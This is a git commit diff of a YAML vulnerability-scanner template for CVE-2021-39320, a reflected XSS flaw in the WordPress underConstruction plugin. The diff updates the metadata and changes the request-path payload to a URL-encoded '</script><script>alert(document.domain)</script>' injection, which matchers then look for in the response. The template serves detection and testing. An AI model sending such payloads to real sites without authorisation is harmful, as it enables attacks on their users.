Update CVE-2021-39320.yaml

patch-1
Prince Chaddha 2021-09-28 15:43:21 +05:30 committed by GitHub
parent 6f3678a7e8
commit af85d5f6cc
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 8 additions and 4 deletions

View File

@ -4,25 +4,29 @@ info:
name: underConstruction < 1.19 - Reflected Cross-Site Scripting name: underConstruction < 1.19 - Reflected Cross-Site Scripting
author: dhiyaneshDK author: dhiyaneshDK
severity: medium severity: medium
description: The underConstruction plugin <= 1.18 for WordPress echoes out the raw value of `$GLOBALS['PHP_SELF']` in the ucOptions.php file. On certain configurations including Apache+modPHP, this makes it possible to use it to perform a reflected Cross-Site Scripting attack by injecting malicious code in the request path.
reference: reference:
- https://wpscan.com/vulnerability/49ae1df0-d6d2-4cbb-9a9d-bf3599429875 - https://wpscan.com/vulnerability/49ae1df0-d6d2-4cbb-9a9d-bf3599429875
tags: wordpress,xss,cves,cve2021 - https://nvd.nist.gov/vuln/detail/CVE-2021-39320
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10 cvss-score: 6.10
cve-id: CVE-2021-39320 cve-id: CVE-2021-39320
cwe-id: CWE-79 cwe-id: CWE-79
description: "The underConstruction plugin <= 1.18 for WordPress echoes out the raw value of `$GLOBALS['PHP_SELF']` in the ucOptions.php file. On certain configurations including Apache+modPHP, this makes it possible to use it to perform a reflected Cross-Site Scripting attack by injecting malicious code in the request path." tags: wordpress,xss,cve,cve2021,wp-plugin
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-admin/admin.php/"><script>alert(/XSS/)</script>/?page=under-construction' - '{{BaseURL}}/wp-admin/admin.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E/?page=under-construction'
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
part: body part: body
words: words:
- '<script>alert(/XSS/)</script>' - '</script><script>alert(document.domain)</script>'
- type: word - type: word
part: header part: header
words: words: